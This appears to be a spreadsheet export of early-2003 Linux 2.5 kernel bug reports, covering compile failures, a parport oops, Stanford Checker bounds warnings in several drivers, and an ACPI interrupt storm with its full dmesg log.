    <t>Exact Kernel version: 2.5.53 Distribution: Debian 3.0 Hardware Environment: Intel Celeron, i810 motherboard Software Environment: Problem Description: Steps to reproduce: I set the BIOS so that the parallel port was ECP, and had IRQ 7 and DMA channel 3 assigned. I then added "parport=0x378,7,3" to the kernel command line, and rebooted. The following oops was printed out: parport0: PC-style at 0x378 (0x778), irq 7, dma 3 [PCSPP,TRISTATE,COMPAT,EPP,ECP,DMA] Unable to handle kernel NULL pointer dereference at virtual address 0000010c printing eip: c010d988 *pde = 00000000 Oops: 0000 CPU: 0 EIP: is at dma_alloc_coherent+0x18/0x7c eax: 0000004c ebx: c7e55e60 ecx: 00000020 edx: c118d7e0 esi: 00001000 edi: c118d7e0 esp: c7ea9e44 ds: 0068 es: 0068 ss: 0068 Process swapper (pid: 1, threadinfo=c7ea8000 task=c7ea6040) Stack: c7e55e60 0 c0179e4d c7ea9f80 c0179ec5 0000004c 00001000 c118d7fc c02a8e40 c02a8ea0 c02a8f44 c7ec4f20 ffffffff c118d7e0 00000378 20 00000047 00000007 00000003 c7eeefff 0000001e Call Trace: [&lt;c0179e4d&gt;] parport_pc_probe_port+0x505/0x604 [&lt;c0179ec5&gt;] pa_probe_port+0x57d/0x604 [&lt;c0142812&gt;] page_symlink+0x122/0x161 [&lt;c0159d65&gt;] sysfs_symlink+0x71/0xa4 [&lt;c016aa11&gt;] compare_pn [&lt;c016aa55&gt;] match_device+0x29/0x44 [&lt;c016ab3c&gt;] pnp_bus_match+0x18/0x2c [&lt;c017ae1d&gt;] bus_match+0x21/0x6c [&lt;c017af16&gt;] dr/0x70 [&lt;c017b1d9&gt;] bus_add_driver+0x9d/0xc0 [&lt;c017b5ba&gt;] driver_register+0x36/0x3c [&lt;c010502c&gt;] init+0x0/0x144 [&lt;c010504+0x1d/0x144 [&lt;c010502c&gt;] init+0x0/0x144 [&lt;c0107001&gt;] kernel_thread_helper+0x5/0xc Code: 8b 80 c0 00 00 00 83 38 ff 74 05 panic: Attempted to kill init! Adding a printk() to just before the call to pci_alloc_consistent shows that priv-&gt;dev is null, so the value of "struct pci_dev *dev" passed into parport_pc_probe_port must have been null. Kernel 2.5.53 is the first 2.5 kernel I've tried to set the DMA channel on, so I don't know when this problem was introduced.</t>
  </si>
  <si>
    <t>compile failure in fs/romfs/inode.c</t>
  </si>
  <si>
    <t>2003-01-01 20:17 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.54 Distribution: Red Hat 8 Hardware Environment: Intel i810, Conexant 56K modem, 1.06 Intel Celeron Software Environment: gcc 3.2 Problem Description: I was going to attempt to hack it but it'd end up extremely botched as I have no idea what that is :) gcc -Wp,-MD,fs/romfs/.inode.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=i686 -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=inode -DKBUILD_MODNAME=romfs -c -o fs/romfs/inode.o fs/romfs/inode.c fs/romfs/inode.c: In function `romfs_statfs': fs/romfs/inode.c:180: dereferencing pointer to incomplete type fs/romfs/inode.c:181: dereferencing pointer to incomplete type fs/romfs/inode.c:182: dereferencing pointer to incomplete type fs/romfs/inode.c:182: dereferencing pointer to incomplete type fs/romfs/inode.c:182: dereferencing pointer to incomplete type fs/romfs/inode.c:183: dereferencing pointer to incomplete type fs/romfs/inode.c:184: dereferencing pointer to incomplete type make[2]: *** [fs/romfs/inode.o] Error 1 make[1]: *** [fs/romfs] Error 2 make: *** [fs] Error 2 Steps to reproduce: File Systems -&gt; Rom File System Support=y</t>
  </si>
  <si>
    <t>Make pdfdocs/psdocs/htmldoc fail in 2.5.54</t>
  </si>
  <si>
    <t>2003-01-02 13:55 UTC</t>
  </si>
  <si>
    <t>2003-06-14 13:04 UTC</t>
  </si>
  <si>
    <t>J</t>
  </si>
  <si>
    <t>Exact Kernel version:2.5.54 Distribution: Mandrake 9.0 Hardware Environment: Software Environment: Problem Description: Make pdfdocs/psdocs/htmldoc fail in 2.5.54 Steps to reproduce: $make pdfdocs make -f scripts/Makefile.build obj=scripts make -f scripts/Makefile.build obj=Documentation/DocBook pdfdocs db2pdf -o Documentation/DocBook/ Documentation/DocBook/parportbook.sgml jw: Please specify at least one catalog make[1]: *** [Documentation/DocBook/parportbook.pdf] Error 4 make: *** [pdfdocs] Error 2</t>
  </si>
  <si>
    <t>2005-07-05 12:07 UTC</t>
  </si>
  <si>
    <t>possible parport/probe.c off by one error from Andy Chou &lt;acc@cs.stanford.edu&gt;</t>
  </si>
  <si>
    <t>2003-01-03 15:57 UTC</t>
  </si>
  <si>
    <t>2005-01-05 02:35 UTC</t>
  </si>
  <si>
    <t>Zwane Mwaikambo</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 Distribution:kernel.org Hardware Environment: unknown Software Environment: Stanford Checker Problem Description: See Thread at: http://marc.theaimsgroup.com/?t=104155440600003&amp;r=1&amp;w=2 [BUG] Off-by-one? /u1/acc/linux/2.5.48/drivers/parport/probe.c:203:parport_device_id: ERROR:BUFFER:203:203:Deref bounds error: buffer + (char*)len points to offset [1000] of buffer of size [1000] [Callstack: /u1/acc/linux/2.5.48/drivers/parport/daisy.c:525:parport_device_id(_, &lt;len=1000, off=0&gt;, 1000)] device is non-compliant anyhow. */ } } end_id: Error ---&gt; buffer[len] = '\0'; parport_negotiate (dev-&gt;port, IEEE1284_MODE_COMPAT); } parport_release (dev); Steps to reproduce:</t>
  </si>
  <si>
    <t>buffer out of bounds in aha1542.c from Andy Chou &lt;acc@cs.stanford.edu&gt;</t>
  </si>
  <si>
    <t>2003-01-03 16:04 UTC</t>
  </si>
  <si>
    <t>2005-07-05 11:52 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 Distribution: kernel.org Hardware Environment: unknown Software Environment: Stanford Checker Problem Description: See thread here:http://marc.theaimsgroup.com/?t=104155440600003&amp;r=1&amp;w=2 [BUG] /u1/acc/linux/2.5.48/drivers/scsi/aha1542.c:992:aha1542_setup: ERROR:BUFFER:992:992:Deref bounds error: ints + 16 points to offset [16] of buffer of size [16] [Callstack: /u1/acc/linux/2.5.48/drivers/scsi/aha1542.c:1029:aha1542_setup(_, &lt;len=16, off=0&gt;)] setup_buson[setup_idx] = ints[0] &gt;= 2 ? ints[2] : 7; setup_busoff[setup_idx] = ints[0] &gt;= 3 ? ints[3] : 5; if (ints[0] &gt;= 4) { int atbt = -1; Error ---&gt; switch (ints[4]) { case 5: atbt = 0x00; break; Steps to reproduce:</t>
  </si>
  <si>
    <t>Possible uninitialised ptr scsi bug from Andy Chou &lt;acc@cs.stanford.edu&gt;</t>
  </si>
  <si>
    <t>2003-01-03 16:27 UTC</t>
  </si>
  <si>
    <t>2005-07-05 11:54 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 Distribution: kernel.org Hardware Environment: unknown Software Environment: Stanford Checker Problem Description: See thread here: http://marc.theaimsgroup.com/?t=104155440600003&amp;r=1&amp;w=2 [BUG] In caller, err_out: is reached in cases where SRpnt is uninitialized. /u1/acc/linux/2.5.48/drivers/scsi/scsi.c:341:scsi_release_request: ERROR:BUFFER:341:341:Deref uninitialized pointer req [Callstack: /u1/acc/linux/2.5.48/drivers/scsi/osst.c:4511:scsi_release_request(&lt;len=0, off=0&gt;)] * has not yet reached the top of the queue. We still need * to free a request when we are done with it, of course. */ void scsi_release_request(Scsi_Request * req) { Error ---&gt; if( req-&gt;sr_command != NULL ) { scsi_release_command(req-&gt;sr_command); req-&gt;sr_command = NULL; Steps to reproduce:</t>
  </si>
  <si>
    <t>Possible out of bounds bug in sb_mixer.c from Stanford Checker</t>
  </si>
  <si>
    <t>Sound(OSS)</t>
  </si>
  <si>
    <t>2003-01-03 16:47 UTC</t>
  </si>
  <si>
    <t>2004-12-02 06:52 UTC</t>
  </si>
  <si>
    <t>Muli Ben-Yehuda</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 Distribution: kernel.org Hardware Environment: unknown Software Environment: Stanford Checker Problem Description: See Thread at: http://marc.theaimsgroup.com/?t=104155440600003&amp;r=1&amp;w=2 [BUG] /u1/acc/linux/2.5.48/sound/oss/sb_mixer.c:238:change_bits: ERROR:BUFFER:238:238:Array bounds error: *devc-&gt;iomap[32] indexed with [32] [Callstack: /u1/acc/linux/2.5.48/sound/oss/sb_ess.c:1722:sb_common_mixer_set(_, 32, _, _) -&gt; /u1/acc/linux/2.5.48/sound/oss/sb_mixer.c:282:change_bits(_, _, 32, 0, _)] static void change_bits(sb_devc * devc, unsigned char *regval, int dev, int chn, int newval) { unsigned char mask; int shift; Error ---&gt; mask = (1 &lt;&lt; (*devc-&gt;iomap)[dev][chn].nbits) - 1; newval = (int) ((newval * mask) + 50) / 100; /* Scale */ shift = (*devc-&gt;iomap)[dev][chn].bitoffs - (*devc-&gt;iomap)[dev][LEFT_CHN].nbits + 1; Steps to reproduce:</t>
  </si>
  <si>
    <t>another possible out of bounds error in sb_mixer.c from Stanford Checker</t>
  </si>
  <si>
    <t>2003-01-03 16:49 UTC</t>
  </si>
  <si>
    <t>2004-12-02 07:00 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 Distribution: kernel.org Hardware Environment: unknown Software Environment: Stanford Checker Problem Description: See thread at: http://marc.theaimsgroup.com/?t=104155440600003&amp;r=1&amp;w=2 [BUG] Caller at fault? /u1/acc/linux/2.5.48/sound/oss/sb_mixer.c:276:sb_common_mixer_set: ERROR:BUFFER:276:276:Array bounds error: *devc-&gt;iomap[32] indexed with [32] [Callstack: /u1/acc/linux/2.5.48/sound/oss/sb_ess.c:1722:sb_common_mixer_set(_, 32, _, _)] int sb_common_mixer_set(sb_devc * devc, int dev, int left, int right) { int regoffs; unsigned char val; Error ---&gt; regoffs = (*devc-&gt;iomap)[dev][LEFT_CHN].regno; if (regoffs == 0) return -EINVAL; Steps to reproduce:</t>
  </si>
  <si>
    <t>One more possible out of bounds error in sb_mixer.c from Stanford Checker</t>
  </si>
  <si>
    <t>2003-01-03 16:51 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 Distribution: kernel.org Hardware Environment: unknown Software Environment: Stanford Checker Problem Description: See thread at: http://marc.theaimsgroup.com/?t=104155440600003&amp;r=1&amp;w=2 [BUG] Look at callstack. /u1/acc/linux/2.5.48/sound/oss/sb_mixer.c:336:smw_mixer_set: ERROR:BUFFER:336:336:Array bounds error: smw_mix_regs[17] indexed with [17] [Callstack: /u1/acc/linux/2.5.48/sound/oss/sb_mixer.c:656:sb_mixer_set(_, 17, _) -&gt; /u1/acc/linux/2.5.48/sound/oss/sb_mixer.c:369:smw_mixer_set(_, 17, _, 100)] sb_setmixer(devc, 0x0e, val); break; default: Error ---&gt; reg = smw_mix_regs[dev]; if (reg == 0) return -EINVAL; sb_setmixer(devc, reg, (24 - (24 * left / 100)) | 0x20); /* 24=mute, 0=max */ Steps to reproduce:</t>
  </si>
  <si>
    <t>2003-01-03 16:52 UTC</t>
  </si>
  <si>
    <t>2003-06-19 22:04 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.48 Distribution: kernel.org Hardware Environment: unknown Software Environment: Stanford Checker Problem Description: See thread at: http://marc.theaimsgroup.com/?t=104155440600003&amp;r=1&amp;w=2 [BUG] The caller is at fault. /u1/acc/linux/2.5.48/sound/pci/ac97/ac97_patch.c:218:patch_ad1881_chained1: ERROR:BUFFER:218:218:Array bounds error: cfg_bits[3] indexed with [-1] [Callstack: /u1/acc/linux/2.5.48/sound/pci/ac97/ac97_patch.c:244:patch_ad1881_chained1(_, -1, 0)] static int patch_ad1881_chained1(ac97_t * ac97, int idx, unsigned short codec_bits) { static int cfg_bits[3] = { 1&lt;&lt;12, 1&lt;&lt;14, 1&lt;&lt;13 }; unsigned short val; Error ---&gt; snd_ac97_write_cache(ac97, AC97_AD_SERIAL_CFG, cfg_bits[idx]); snd_ac97_write_cache(ac97, AC97_AD_CODEC_CFG, 0x0004); // SDIE val = snd_ac97_read(ac97, AC97_VENDOR_ID2); if ((val &amp; 0xff40) != 0x5340) Steps to reproduce:</t>
  </si>
  <si>
    <t>3c509.c wants updating to new pnp model</t>
  </si>
  <si>
    <t>2003-01-06 08:33 UTC</t>
  </si>
  <si>
    <t>Matt Avery</t>
  </si>
  <si>
    <t>2003-02-20 18:55 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.54 Distribution: n/a Hardware Environment: i586 (AMD K6 3D) Software Environment: n/a Problem Description: 3c509.c wants updating to new pnp model, because isapnp has been removed. Steps to reproduce: enable isapnp - 3c509.c won't compile</t>
  </si>
  <si>
    <t>tridentfb.c doesn't compile</t>
  </si>
  <si>
    <t>2003-01-09 05:15 UTC</t>
  </si>
  <si>
    <t>Beat Bolli</t>
  </si>
  <si>
    <t>2003-02-12 10:12 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.55-bk as of 2003-01-09T09:56:25 Distribution: Debian unstable Hardware Environment: Pentium I 200 MHz MMX, 96 MB RAM, 4 GB HD Software Environment: gcc-3.2 Problem Description: Compiling tridentfb.c gives the following errors: drivers/video/tridentfb.c:30:25: video/fbcon.h: No such file or directory drivers/video/tridentfb.c:31:30: video/fbcon-cfb8.h: No such file or directory drivers/video/tridentfb.c:32:31: video/fbcon-cfb16.h: No such file or directory drivers/video/tridentfb.c:33:31: video/fbcon-cfb24.h: No such file or directory drivers/video/tridentfb.c:34:31: video/fbcon-cfb32.h: No such file or directory drivers/video/tridentfb.c:64: field `gen' has incomplete type drivers/video/tridentfb.c: In function `trident_bmove': drivers/video/tridentfb.c:321: warning: implicit declaration of function `fontwidth' drivers/video/tridentfb.c:324: warning: implicit declaration of function `fontheight' drivers/video/tridentfb.c:412: confused by earlier errors, bailing out make[2]: *** [drivers/video/tridentfb.o] Error 1 The .h files in question have been removed on 2002-12-10T17:19, according to the BitKeeper/deleted directory.</t>
  </si>
  <si>
    <t>compile failure in drivers/ide/ide-pnp.c</t>
  </si>
  <si>
    <t>2003-01-09 16:46 UTC</t>
  </si>
  <si>
    <t>2003-01-13 21:05 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.55 Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR Software Environment: gcc 3.2.1, glibc 2.3.1, ld 2.13.90.0.16 Problem Description: gcc -Wp,-MD,drivers/ide/.ide-pnp.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=ide_pnp -DKBUILD_MODNAME=ide_pnp -c -o drivers/ide/ide-pnp.o drivers/ide/ide-pnp.c drivers/ide/ide-pnp.c: In function `pnpide_init': drivers/ide/ide-pnp.c:117: structure has no member named `deactivate' drivers/ide/ide-pnp.c:118: structure has no member named `deactivate' drivers/ide/ide-pnp.c:124: warning: implicit declaration of function `isapnp_find_dev' drivers/ide/ide-pnp.c:125: warning: assignment makes pointer from integer without a cast drivers/ide/ide-pnp.c:127: structure has no member named `active' drivers/ide/ide-pnp.c:130: structure has no member named `prepare' drivers/ide/ide-pnp.c:130: structure has no member named `prepare' drivers/ide/ide-pnp.c:135: structure has no member named `activate' drivers/ide/ide-pnp.c:135: structure has no member named `activate' drivers/ide/ide-pnp.c:142: structure has no member named `deactivate' drivers/ide/ide-pnp.c:143: structure has no member named `deactivate' make[2]: *** [drivers/ide/ide-pnp.o] Error 1 make[1]: *** [drivers/ide] Error 2 make: *** [drivers] Error 2 Steps to reproduce: ATA/ATAPI/MFM/RLL device support ---&gt; IDE, ATA and ATAPI Block devices ---&gt; [*] ISA-PNP EIDE support CONFIG_BLK_DEV_ISAPNP=y</t>
  </si>
  <si>
    <t>(net ne2k) "Hw. address read/write mismap" when ejecting NE2000 Compatible pcmcia card</t>
  </si>
  <si>
    <t>2.6.0-test4</t>
  </si>
  <si>
    <t>2003-01-11 05:26 UTC</t>
  </si>
  <si>
    <t>2005-03-07 10:56 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.56 Distribution: Debian/Sarge Hardware Environment: THinkpad 600 Problem Description: Ejecting the (running) card yields: Jan 11 14:06:03 gswi1164 kernel: Hw. address read/write mismap 0 Jan 11 14:06:03 gswi1164 kernel: Hw. address read/write mismap 1 Jan 11 14:06:03 gswi1164 kernel: Hw. address read/write mismap 2 Jan 11 14:06:03 gswi1164 kernel: Hw. address read/write mismap 3 Jan 11 14:06:03 gswi1164 kernel: Hw. address read/write mismap 4 Jan 11 14:06:03 gswi1164 kernel: Hw. address read/write mismap 5 Other than that, hotplugging the card works fine</t>
  </si>
  <si>
    <t>ACPI is slowing down machine, high number of interrupts</t>
  </si>
  <si>
    <t>2.5.63</t>
  </si>
  <si>
    <t>2003-01-11 05:50 UTC</t>
  </si>
  <si>
    <t>Paul Rolland</t>
  </si>
  <si>
    <t>2004-03-03 14:51 UTC</t>
  </si>
  <si>
    <t>Exact Kernel version: 2.5.56 Distribution: Redhat 8.0 Hardware Environment: Motherboard : ASUS P4S8X 512 MB Ram 2 IDE HDD, 1 IDE DVD Rom 1 IDE CDRW 1 SCSI 2924U2W + 1 SCSI HDD2 [14:46] rol@donald:~&gt; cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 CPU 2.40GHz stepping : 4 cpu MHz : 2423.570 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm bogomips : 4800.51 Software Environment: Problem Description: When booting with ACPI enabled, the machine is desperately slow. Using "acpi=off" at boot time restores normal behavior. When looking more closely at the machine when slow, /proc/interrupts says 6 [14:47] rol@donald:~&gt; cat /proc/uptime ; cat /proc/interrupts 511.56 474.32 CPU0 0: 511578 IO-APIC-edge timer 1: 115 IO-APIC-edge i8042 2: 0 XT-PIC cascade 4: 692 IO-APIC-edge serial 8: 1 IO-APIC-edge rtc 9: 58034321 IO-APIC-level acpi 12: 55 IO-APIC-edge i8042 14: 3198 IO-APIC-edge ide0 15: 27 IO-APIC-edge ide1 17: 0 IO-APIC-level EMU10K1 18: 416 IO-APIC-level eth0 19: 202 IO-APIC-level aic7xxx NMI: 0 LOC: 509991 ERR: 0 MIS: 0 which makes 113570 interrupts for acpi each second.... Steps to reproduce: Anytime with acpi activated on my machine. Please feel free to ask for more details if required. Just after : dmesg output. 8 [14:48] rol@donald:~&gt; dmesg 16944.11825) @ 0x1fffc0b2 ACPI: BOOT (v001 ASUS P4S8X 16944.11825) @ 0x1fffc030 ACPI: MADT (v001 ASUS P4S8X 16944.11825) @ 0x1fffc058 ACPI: DSDT (v001 ASUS P4S8X 00000.04096) @ 0x00000000 ACPI: BIOS passes blacklist ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 15:2 APIC version 16 ACPI: LAPIC_NMI (acpi_id[0x00] polarity[0x1] trigger[0x1] lint[0x1]) ACPI: IOAPIC (id[0x02] address[0xfec00000] global_irq_base[0x0]) IOAPIC[0]: Assigned apic_id 2 IOAPIC[0]: apic_id 2, version 128, address 0xfec00000, IRQ 0-23 ACPI: INT_SRC_OVR (bus[0] irq[0x0] global_irq[0x2] polarity[0x0] trigger[0x1]) ACPI: INT_SRC_OVR (bus[0] irq[0x9] global_irq[0x14] polarity[0x3] trigger[0x3]) Using ACPI (MADT) for SMP configuration information Building zonelist for node : 0 Kernel command line: auto BOOT_IMAGE=test ro BOOT_FILE=/boot/vmlinuz-2.5.56 panic=30 console=ttyS0 Initializing CPU#0 PID hash table entries: 2048 (order 11: 16384 bytes) Detected 2423.570 MHz processor. Console: colour VGA+ 80x50 Calibrating delay loop... 4800.51 BogoMIPS Memory: 513280k/524272k available (3194k kernel code, 10200k reserved, 1155k data, 368k init, 0k highmem) Security Scaffold v1.0.0 initialized Dentry cache hash table entries: 65536 (order: 7, 524288 bytes) Inode-cache hash table entries: 32768 (order: 6, 262144 bytes) Mount-cache hash table entries: 512 (order: 0, 4096 bytes) -&gt; /dev -&gt; /dev/console -&gt; /root CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: After generic, caps: 3febfbff 00000000 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU#0: Intel P4/Xeon Extended MCE MSRs (12) available CPU#0: Thermal monitoring enabled Machine check exception polling timer started. CPU: Intel(R) Pentium(R) 4 CPU 2.40GHz stepping 04 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. POSIX conformance testing by UNIFIX enabled ExtINT on CPU#0 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 ENABLING IO-APIC IRQs init IO_APIC IRQs IO-APIC (apicid-pin) 2-0, 2-16, 2-17, 2-18, 2-19, 2-21, 2-22, 2-23 not connected. ..TIMER: vector=0x31 pin1=2 pin2=0 number of MP IRQ sources: 17. number of IO-APIC #2 registers: 24. testing the IO APIC....................... IO APIC #2...... .... register #00: 02000000 ....... : physical APIC id: 02 ....... : Delivery Type: 0 ....... : LTS : 0 .... register #01: 00178080 ....... : max redirection entries: 0017 ....... : PRQ implemented: 1 ....... : IO APIC version: 0080 WARNING: unexpected IO-APIC, please mail to linux-smp@vger.kernel.org .... register #02: 02000000 ....... : arbitration: 02 .... IRQ redirection table: NR Log Phy Mask Trig IRR Pol Stat Dest Deli Vect: 00 000 00 1 0 0 0 0 0 0 00 01 001 01 0 0 0 0 0 1 1 39 02 001 01 0 0 0 0 0 1 1 31 03 001 01 0 0 0 0 0 1 1 41 04 001 01 0 0 0 0 0 1 1 49 05 001 01 0 0 0 0 0 1 1 51 06 001 01 0 0 0 0 0 1 1 59 07 001 01 0 0 0 0 0 1 1 61 08 001 01 0 0 0 0 0 1 1 69 09 001 01 0 0 0 0 0 1 1 71 0a 001 01 0 0 0 0 0 1 1 79 0b 001 01 0 0 0 0 0 1 1 81 0c 001 01 0 0 0 0 0 1 1 89 0d 001 01 0 0 0 0 0 1 1 91 0e 001 01 0 0 0 0 0 1 1 99 0f 001 01 0 0 0 0 0 1 1 A1 10 000 00 1 0 0 0 0 0 0 00 11 000 00 1 0 0 0 0 0 0 00 12 000 00 1 0 0 0 0 0 0 00 13 000 00 1 0 0 0 0 0 0 00 14 001 01 1 1 0 1 0 1 1 71 15 000 00 1 0 0 0 0 0 0 00 16 000 00 1 0 0 0 0 0 0 00 17 000 00 1 0 0 0 0 0 0 00 IRQ to pin mappings: IRQ0 -&gt; 0:2 IRQ1 -&gt; 0:1 IRQ3 -&gt; 0:3 IRQ4 -&gt; 0:4 IRQ5 -&gt; 0:5 IRQ6 -&gt; 0:6 IRQ7 -&gt; 0:7 IRQ8 -&gt; 0:8 IRQ9 -&gt; 0:9-&gt; 0:20 IRQ10 -&gt; 0:10 IRQ11 -&gt; 0:11 IRQ12 -&gt; 0:12 IRQ13 -&gt; 0:13 IRQ14 -&gt; 0:14 IRQ15 -&gt; 0:15 .................................... done. Using local APIC timer interrupts. calibrating APIC timer ... ..... CPU clock speed is 2423.0537 MHz. ..... host bus clock speed is 134.0640 MHz. Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket mtrr: v2.0 (20020519) device class 'cpu': registering device class cpu: adding driver system:cpu PCI: PCI BIOS revision 2.10 entry at 0xf11a0, last bus=1 PCI: Using configuration type 1 device class cpu: adding device CPU 0 interfaces: adding device CPU 0 BIO: pool of 256 setup, 14Kb (56 bytes/bio) biovec pool[0]: 1 bvecs: 256 entries (12 bytes) biovec pool[1]: 4 bvecs: 256 entries (48 bytes) biovec pool[2]: 16 bvecs: 256 entries (192 bytes) biovec pool[3]: 64 bvecs: 256 entries (768 bytes) biovec pool[4]: 128 bvecs: 256 entries (1536 bytes) biovec pool[5]: 256 bvecs: 256 entries (3072 bytes) ACPI: Subsystem revision 20030109 IOAPIC[0]: Set PCI routing entry (2-9 -&gt; 0x71 -&gt; IRQ 9) ACPI-0262: *** Info: GPE Block0 defined as GPE0 to GPE15 ACPI-0262: *** Info: GPE Block1 defined as GPE16 to GPE31 ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 *5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 *7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 10 11 12 14 15, enabled at IRQ 9) ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 10 11 12 14 15, enabled at IRQ 9) ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 11 12 14 15, enabled at IRQ 9) ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 10 11 12 14 15, enabled at IRQ 9) ACPI: PCI Root Bridge [PCI0] (00:00) PCI: Probing PCI hardware (bus 00) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCI1._PRT] Linux Plug and Play Support v0.93 (c) Adam Belay block request queues: 128 requests per read queue 128 requests per write queue 8 requests per batch enter congestion at 31 exit congestion at 33 SCSI subsystem driver Revision: 1.00 device class 'scsi-host': registering IOAPIC[0]: Set PCI routing entry (2-16 -&gt; 0xa9 -&gt; IRQ 16) 00:00:02[A] -&gt; 2-16 -&gt; IRQ 16 IOAPIC[0]: Set PCI routing entry (2-17 -&gt; 0xb1 -&gt; IRQ 17) 00:00:02[B] -&gt; 2-17 -&gt; IRQ 17 IOAPIC[0]: Set PCI routing entry (2-18 -&gt; 0xb9 -&gt; IRQ 18) 00:00:02[C] -&gt; 2-18 -&gt; IRQ 18 IOAPIC[0]: Set PCI routing entry (2-19 -&gt; 0xc1 -&gt; IRQ 19) 00:00:02[D] -&gt; 2-19 -&gt; IRQ 19 IOAPIC[0]: Set PCI routing entry (2-20 -&gt; 0xc9 -&gt; IRQ 20) 00:00:03[A] -&gt; 2-20 -&gt; IRQ 20 IOAPIC[0]: Set PCI routing entry (2-21 -&gt; 0xd1 -&gt; IRQ 21) 00:00:03[B] -&gt; 2-21 -&gt; IRQ 21 IOAPIC[0]: Set PCI routing entry (2-22 -&gt; 0xd9 -&gt; IRQ 22) 00:00:03[C] -&gt; 2-22 -&gt; IRQ 22 IOAPIC[0]: Set PCI routing entry (2-23 -&gt; 0xe1 -&gt; IRQ 23) 00:00:03[D] -&gt; 2-23 -&gt; IRQ 23 Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed Pin 2-18 already programmed Pin 2-19 already programmed Pin 2-16 already programmed Pin 2-17 already programmed PCI: Using ACPI for IRQ routing PCI: if you experience problems, try using option 'pci=noacpi' or even 'acpi=off' SBF: Simple Boot Flag extension found and enabled. SBF: Setting boot flags 0x1 cpufreq: P4/Xeon(TM) CPU On-Demand Clock Modulation available IA-32 Microcode Update Driver: v1.11 &lt;tigran@veritas.com&gt; Enabling SEP on CPU 0 aio_setup: sizeof(struct page) = 40 VFS: Disk quotas dquot_6.5.1 Journalled Block Device driver loaded Installing knfsd (copyright (C) 1996 okir@monad.swb.de). NTFS driver 2.1.0 [Flags: R/O]. udf: registering filesystem Capability LSM initialized Initializing Cryptographic API ACPI: Power Button (FF) [PWRF] ACPI: Processor [CPU0] (supports C1) Serial: 8250/16550 driver $Revision: 1.90 $ IRQ sharing disabled ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A parport0: PC-style at 0x378 (0x778) [PCSPP,TRISTATE,EPP] parport0: irq 7 detected parport0: cpp_daisy: aa5500ff(98) parport0: assign_addrs: aa5500ff(98) parport0: Printer, HEWLETT-PACKARD DESKJET 920C device class 'tty': registering pty: 256 Unix98 ptys configured lp0: using parport0 (polling). Real Time Clock Driver v1.11 Non-volatile memory driver v1.2 Linux agpgart interface v0.100 (c) Dave Jones agpgart: Unsupported SiS chipset (device id: 0648), you might want to try agp_try_unsupported=1. [drm] Initialized radeon 1.7.0 20020828 on minor 0 Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize loop: loaded (max 8 devices) 3c59x: Donald Becker and others. www.scyld.com/network/vortex.html 00:0a.0: 3Com PCI 3c905 Boomerang 100baseTx at 0x7400. Vers LK1.1.18 pcnet32.c:v1.27b 01.10.2002 